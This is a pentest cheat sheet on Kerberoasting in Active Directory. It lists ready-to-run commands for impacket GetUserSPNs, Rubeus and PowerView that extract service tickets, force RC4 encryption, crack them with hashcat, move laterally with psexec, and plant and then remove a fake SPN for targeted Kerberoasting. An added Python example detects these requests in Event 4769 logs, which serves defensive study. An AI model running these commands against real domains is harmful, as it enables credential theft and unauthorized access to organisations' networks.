Kerberoasting
In the second phase of Kerberos, the client asks the KDC for a service ticket (TGS) for a resource identified by a Service Principal Name (SPN). The KDC applies no authorization checks or permissions at this point; that is done by the service itself when it receives the ticket. Consequently an attacker holding any valid domain account can request the TGS for a given SPN and crack it offline to recover the password of the account running that SPN.
NOTE: If the SPN runs in the context of a computer account, a managed service account (MSA) or a group-managed service account (gMSA), the password is randomly generated, complex and 120 characters long, which makes cracking it infeasible. For this reason, focus on SPNs running in the context of user accounts.
Attack
Linux
impacket-GetUserSPNs lists the user accounts that have an SPN and can request the TGS for each of them. You need the credentials of a domain user to perform the extraction.
Synchronize the time with the domain controller first, using ntpdate or rdate (Kerberos rejects requests with too much clock skew).
sudo ntpdate <IP_DC>
Listing SPN accounts
GetUserSPNs.py -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]>
Pull all TGS tickets
GetUserSPNs.py -request -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]
Get the TGS ticket for a specific account
GetUserSPNs.py -request-user <NAME> -dc-ip <IP_DC> <DOMAIN>/<USER[:PASSWORD]> [-outputfile <OUT_NAME>]
Offline cracking of the output with hashcat (-m 13100)
Windows
Since we are already on a Windows system joined to the domain, we do not need to specify a username and password: the logged-on user's credentials are used.
We can use Rubeus to request the TGS for the user accounts that have SPNs.
.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /outfile:<OutputFile> [/user:<NAME_TARGET>] [/tgtdeleg]
/tgtdeleg: against domain controllers up to Windows Server 2016 it lets you request the ticket with RC4 encryption, which is much easier to crack.
Or with PowerView (old and new)
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser -Identity <NAME_TARGET> | Get-DomainSPNTicket -Format Hashcat
Offline cracking of the file <OutputFile> with hashcat (ex. -m 13100)
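Detection side, added here as an example and not part of the original page: the requests above leave Event ID 4769 (Kerberos service ticket requested) on the domain controller, and two things in it stand out: a ticket encryption type of 0x17 (RC4, what /tgtdeleg asks for) for a user-account SPN, and one account requesting tickets for many distinct SPNs within seconds. The log lines, the key=value export format and the account/service/etype field names are constructed for this example.

```python
# Added example (not from the original page): flag the Kerberoasting pattern described
# above in Windows Security Event 4769 (Kerberos service ticket requested) data.
# Field names mirror the 4769 event; the log lines below are constructed, one per event.
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_4769 = """\
time=2024-05-01T09:00:01 account=alice service=sqlsvc etype=0x12 ip=10.0.0.21
time=2024-05-01T09:00:05 account=jdoe service=WS01$ etype=0x12 ip=10.0.0.22
time=2024-05-01T09:03:10 account=jdoe service=sqlsvc etype=0x17 ip=10.0.0.22
time=2024-05-01T09:03:11 account=jdoe service=httpsvc etype=0x17 ip=10.0.0.22
time=2024-05-01T09:03:11 account=jdoe service=mssql02 etype=0x17 ip=10.0.0.22
time=2024-05-01T09:03:12 account=jdoe service=backupsvc etype=0x17 ip=10.0.0.22
time=2024-05-01T09:40:00 account=bob service=httpsvc etype=0x17 ip=10.0.0.30
"""
RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC / RC4-HMAC-EXP: the tickets that crack easily

def parse_4769(text):
    """Parse the key=value export into dicts; 'time' becomes a datetime."""
    events = []
    for line in text.splitlines():
        rec = dict(kv.split("=", 1) for kv in line.split())
        rec["time"] = datetime.fromisoformat(rec["time"])
        events.append(rec)
    return events

def roastable(service):
    """Machine accounts ($) and krbtgt have long random keys; user SPNs are the risk."""
    return not service.endswith("$") and service.lower() != "krbtgt"

def rc4_user_spn_requests(events):
    """Rule 1: an RC4 service ticket for a user-account SPN deserves a look."""
    return [(e["account"], e["service"]) for e in events
            if e["etype"] in RC4_ETYPES and roastable(e["service"])]

def burst_requesters(events, window=timedelta(minutes=5), threshold=3):
    """Rule 2: one account pulling tickets for `threshold` or more distinct user SPNs
    inside `window` matches bulk tooling. Returns {account: distinct SPNs seen}."""
    by_account = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        if roastable(e["service"]):
            by_account[e["account"]].append(e)
    flagged = {}
    for account, evs in by_account.items():
        for i, start in enumerate(evs):
            spns = {x["service"] for x in evs[i:] if x["time"] - start["time"] <= window}
            if len(spns) >= threshold:
                flagged[account] = len(spns)
                break
    return flagged
```

Tune the window and threshold to the environment's baseline; legitimate service accounts and monitoring tools can also touch several SPNs in a short time, so correlate with the requesting IP before acting.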
Connect
psexec.py <DOMAIN>/<USER>@<IP>
psexec.py <DOMAIN>/<USER>@<MACHINE_NAME>.<DOMAIN> -target-ip <MACHINE_IP>
Targeted Kerberoasting
This abuse can be carried out when you control an object that holds GenericAll, GenericWrite, WriteProperty or Validated-SPN rights over the target account.
The attacker adds an SPN (servicePrincipalName) to that account. Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.
targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-ip <IP>
With Kerberos authentication (-k) we have to use a TGT, otherwise the tool fails with the error "'NoneType' object has no attribute 'getCredential'".
impacket-getTGT <DOMAIN>/<USER>:<PASS> -dc-ip <IP>
export KRB5CCNAME=./<USER>.ccache
targetedKerberoast.py -u <USER> -p <PASS> -d <DOMAIN> --dc-host <HOSTNAME> -v -k
For some tools (ex. evil-winrm) it may be necessary to set up the /etc/krb5.conf file.
The minimum structure is as follows:
[libdefaults]
default_realm = <DOMAIN.COM>
[realms]
<DOMAIN.COM> = {
kdc = <DC.DOMAIN.COM>
}
$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)
Creating a Fake SPN with PowerView (old and new)
Import-Module .\PowerView.ps1
Set-DomainObject -Credential $Cred -Identity <TARGET> -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
Kerberoasting with Rubeus
.\Rubeus.exe kerberoast /user:<USER> /nowrap
Cleanup fake SPN
Set-DomainObject -Credential $Cred -Identity <TARGET> -Clear serviceprincipalname -Verbose